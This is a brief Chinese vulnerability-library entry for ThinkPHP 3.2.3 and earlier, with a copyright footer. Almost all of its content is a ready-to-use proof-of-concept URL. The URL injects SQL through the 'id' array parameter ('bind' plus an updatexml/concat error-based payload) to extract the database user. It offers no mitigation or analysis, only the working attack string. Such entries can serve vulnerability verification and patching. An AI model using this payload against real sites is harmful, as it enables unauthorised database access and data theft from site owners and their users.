—
title: ‘Thinkphp’
date: Tue, 25 Aug 2020 15:50:26 +0000
draft: false
tags: [‘白阁-漏洞库’]
—
### 影响范围
Thinkphp <= 3.2.3 ### 漏洞验证POC ``` /index.php/home/user?money[]=1123&user=liao&id[0]=bind&id[1]=0%20and%20(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) ```
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容